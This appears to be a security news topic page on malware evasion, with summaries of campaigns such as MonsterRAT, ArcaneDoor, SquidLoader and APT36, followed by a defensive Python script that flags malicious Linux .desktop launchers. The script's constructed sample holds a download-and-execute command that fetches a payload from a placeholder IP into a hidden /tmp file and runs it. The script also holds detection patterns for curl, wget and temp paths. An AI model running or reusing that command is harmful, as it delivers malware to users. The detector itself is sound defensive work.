Topic: evasion techniques

  • MonsterRAT: Stealthy Malware Threatens Windows Systems

    A sophisticated phishing campaign distributes the previously undocumented MonsterRAT malware, which targets Windows systems and grants attackers full administrative control through a multi-stage infection process. The attack uses phishing emails disguised as business correspondence to deliver the...

  • Defeat Malware Evasion with New Framework

    Malware creators use subtle code modifications to evade AI detection systems while preserving harmful functionality, but a new framework called ERDALT offers a countermeasure by focusing on robust features. ERDALT, developed by Inria and CISPA, trains on adversarial examples and prioritizes stabl...

  • ArcaneDoor Hackers Renew Cisco Attacks with Stealthy Campaign

    A sophisticated cyber-espionage campaign by the ArcaneDoor threat actor has compromised older Cisco ASA firewalls using zero-day vulnerabilities to implant malware and steal data. The attackers used advanced evasion techniques and modified the ROM Monitor to ensure persistence, but only older mod...

  • SquidLoader Malware Threatens Hong Kong Finance Sector

    SquidLoader is a sophisticated new malware targeting Hong Kong financial institutions, using stealthy evasion techniques to deliver Cobalt Strike Beacon payloads undetected. The attack starts with spear-phishing emails containing disguised RAR archives, deploying multi-stage infection processes l...

  • Chaos Ransomware Strikes: New Wave of Cyberattacks

    The ransomware group Chaos employs aggressive double extortion tactics and psychological pressure, offering rewards for compliance while escalating threats like data leaks and DDoS attacks for non-payment. Chaos targets organizations globally, particularly in the U.S., UK, New Zealand, and India,...

  • North Korean Hackers Exploit Seoul Intelligence Files

    A sophisticated spear-phishing campaign, attributed to North Korean-linked APT37, targeted South Korean intelligence and government personnel using deceptively authentic documents as bait. The operation unfolded in two phases: one distributing a malicious file disguised as a trusted newsletter to...

  • Active Attacks Exploit Cisco ASA Zero-Day Flaws

    A coordinated international cybersecurity alert warns of active attacks exploiting zero-day vulnerabilities in Cisco ASA and FTD software, attributed to a sophisticated, likely state-sponsored threat actor linked to previous ArcaneDoor campaigns. Two critical vulnerabilities (CVE-2025-20362 and C...

  • CISA Mandates Urgent Patching for Actively Exploited Cisco Zero-Day Flaws

    CISA has issued an emergency directive requiring U.S. federal agencies to immediately address two actively exploited critical vulnerabilities (CVE-2025-20333 and CVE-2025-20362) in Cisco ASA and FTD firewalls, which allow unauthenticated remote code execution. Agencies must inventory all affected...

  • APT36 Hackers Use Linux .desktop Files to Deploy Malware in Latest Campaign

    A cyber espionage campaign by Pakistani-linked group APT36 is targeting Indian government and defense sectors using malicious Linux .desktop files disguised as PDFs in phishing emails. The attack involves weaponized .desktop files that execute hidden commands to download and run a Go-based malwar...

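The APT36 item above describes a launcher that looks like a PDF but whose Exec= line silently downloads and runs a payload. The script below is an added example, not code from the article or from the campaign's own files: it parses a .desktop file and flags the traits that pattern leaves behind (document-style Name/Icon, a shell wrapper with -c, curl/wget, drops into /tmp or hidden paths, Terminal=false). The two sample launchers are constructed, the indicator names and regular expressions are this example's own heuristics, and shlex is used as an approximation of the Desktop Entry quoting rules.

```python
"""Heuristic triage of Linux .desktop launchers for the "PDF that is really a
downloader" pattern. Added example with constructed samples; the indicators
are this script's own heuristics, not a published detection rule."""
import configparser
import os
import re
import shlex

# Constructed sample: mimics a PDF and hides a download-and-execute chain
# behind the icon. Not a real campaign artifact.
SUSPICIOUS_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Defence_Budget_2025.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://203.0.113.10/x -o /tmp/.x; chmod +x /tmp/.x; /tmp/.x &"
"""

# Constructed sample: an ordinary application launcher for comparison.
BENIGN_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Firefox
Icon=firefox
Terminal=false
Exec=firefox %u
"""

DOC_NAME_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|odt)\b", re.IGNORECASE)
DOC_ICON_RE = re.compile(r"pdf|document|office", re.IGNORECASE)
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
TMP_PATH_RE = re.compile(r"(?:/tmp|/var/tmp|/dev/shm)/")
HIDDEN_FILE_RE = re.compile(r"/\.[A-Za-z0-9_]")   # dotfile anywhere in the command
SHELL_WRAPPERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}


def parse_desktop(text):
    """Return the [Desktop Entry] group as a dict, preserving key case."""
    cp = configparser.RawConfigParser()   # no %-interpolation, so %u/%f survive
    cp.optionxform = str                  # .desktop keys are case-sensitive
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        raise ValueError("not a .desktop file: missing [Desktop Entry] group")
    return dict(cp.items("Desktop Entry"))


def triage(text):
    """Return the indicator names found in one .desktop file (empty if clean)."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    try:
        tokens = shlex.split(exec_line)   # approximation of the spec's quoting
    except ValueError:
        tokens = exec_line.split()
    findings = []
    if DOC_NAME_RE.search(entry.get("Name", "")) or DOC_ICON_RE.search(entry.get("Icon", "")):
        findings.append("document-lookalike")
    if tokens and os.path.basename(tokens[0]) in SHELL_WRAPPERS and "-c" in tokens:
        findings.append("shell-wrapper")
    if DOWNLOADER_RE.search(exec_line):
        findings.append("downloader")
    if TMP_PATH_RE.search(exec_line):
        findings.append("writes-to-tmp")
    if HIDDEN_FILE_RE.search(exec_line):
        findings.append("hidden-path")
    # Terminal=false only matters when something worth hiding is being run.
    if entry.get("Terminal", "false").lower() == "false" and (
        "shell-wrapper" in findings or "downloader" in findings
    ):
        findings.append("no-terminal")
    return findings


def is_suspicious(text):
    """Document lookalike plus a shell wrapper or downloader is the lure shape."""
    f = triage(text)
    return "document-lookalike" in f and ("shell-wrapper" in f or "downloader" in f)


def scan_directory(path):
    """Triage every *.desktop file under path; returns {file: findings}."""
    results = {}
    for root, _dirs, files in os.walk(path):
        for name in files:
            if name.endswith(".desktop"):
                full = os.path.join(root, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    try:
                        results[full] = triage(fh.read())
                    except (ValueError, configparser.Error):
                        results[full] = ["unparseable"]
    return results


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_DESKTOP), ("benign", BENIGN_DESKTOP)):
        print(label, triage(sample), is_suspicious(sample))
    # Typical places a dropped lure or persistence entry lands:
    for d in ("~/Desktop", "~/Downloads", "~/.local/share/applications", "~/.config/autostart"):
        print(scan_directory(os.path.expanduser(d)))
```

Run it over the directories listed at the bottom, or feed it a quarantined attachment; a file that scores `document-lookalike` together with `shell-wrapper` or `downloader` is the shape worth pulling for analysis, while a single indicator on its own (a PDF viewer launcher with Terminal=false, say) is normal.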